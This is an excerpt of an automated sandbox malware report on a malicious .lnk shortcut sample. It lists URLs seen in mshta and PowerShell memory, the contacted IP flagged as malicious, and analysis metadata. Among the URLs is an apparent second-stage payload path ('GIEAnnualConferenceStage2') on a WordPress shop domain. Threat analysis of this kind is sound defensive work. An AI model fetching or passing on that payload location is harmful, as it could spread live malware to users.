                                              		unknown
                                              https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Armshta.exe, 00000003.00000003.1933398840.00000184077A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2amshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://gurt.duna.ua/dohovir-oferty/mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2C:mshta.exe, 00000003.00000002.2951889230.0000017C05510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2imshta.exe, 00000003.00000002.2951889230.0000017C05536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://gurt.duna.ua/ru/optovaia-prodazha-duna/mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2wmshta.exe, 00000003.00000003.1823768527.00000184077B1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://gurt.duna.ua/help/mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1Pmshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2smshta.exe, 00000003.00000002.2952176599.0000017C057E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.pngmshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpgmshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.5mshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1731496106.00000226019EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.0000022610080000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svgmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://gurt.duna.ua/wp-admin/admin-ajax.phpmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://gurt.duna.ua/my-account/orders/mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1731496106.0000022600001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000005.00000003.1899762996.000001FF74F42000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.57mshta.exe, 00000003.00000002.2951889230.0000017C05585000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideOmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823535110.00000184077F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1Fmshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                    		unknown
                                                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.cmshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1%mshta.exe, 00000003.00000002.2954468582.0000018407B2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1934399175.0000018407B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://contoso.com/Iconpowershell.exe, 00000002.00000002.1744803090.00000226101B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)mshta.exe, 00000003.00000002.2951889230.0000017C0554D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            http://crl.ver)svchost.exe, 00000005.00000002.2953737003.000001FF7500F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.csmshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpgmshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://schema.orgmshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7js=mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangemshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1731496106.0000022601991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731496106.0000022601863000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                            		unknown
                                                                                                                            https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.12mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://gurt.duna.ua/cart/mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://gmpg.org/xfn/11mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.pngmshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.pngmshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://gurt.duna.ua/wp-json/mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5mshta.exe, 00000003.00000003.1935015286.00000184077EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953444434.00000184077F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?vemshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.jsmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.csmshta.exe, 00000003.00000003.1823904965.0000017C055E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2ymshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpgmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7bmshta.exe, 00000003.00000002.2953230766.0000018407710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2txmshta.exe, 00000003.00000002.2953230766.0000018407788000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823768527.000001840779C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?vmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5?ver=2.3.73.8mshta.exe, 00000003.00000003.1823556487.0000018407789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://yoast.com/wordpress/plugins/seo/mshta.exe, 00000003.00000003.1933547398.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2954374355.0000018407A42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://gurt.duna.ua/my-account/mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-linkmshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://gurt.duna.ua/comments/feed/mshta.exe, 00000003.00000002.2954352575.00000184079F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2953230766.0000018407721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823981462.0000018407743000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://gurt.duna.ua/order-table/mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:mshta.exe, 00000003.00000002.2951889230.0000017C055D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4mshta.exe, 00000003.00000002.2954374355.0000018407A4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1933547398.0000018407A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?6mshta.exe, 00000003.00000003.1823768527.00000184077C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1823556487.00000184077C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown

                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public IPs

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          185.68.16.189
                                                                                                                                                                                          		gurt.duna.uaUkraine
                                                                                                                                                                                          		200000UKRAINE-ASUAtrue

                                                                                                                                                                                          Private

                                                                                                                                                                                          IP
                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1543062
                                                                                                                                                                                          Start date and time:2024-10-27 07:34:06 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 4m 50s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Number of analysed new started processes analysed:9
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:T15hf0Y3mp.lnk
                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                          Original Sample Name:b8d97d29e99e1f96e06836468db56855dc09305e3ed663c720fe700ea4bf6e73.lnk
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal76.winLNK@7/39@1/2
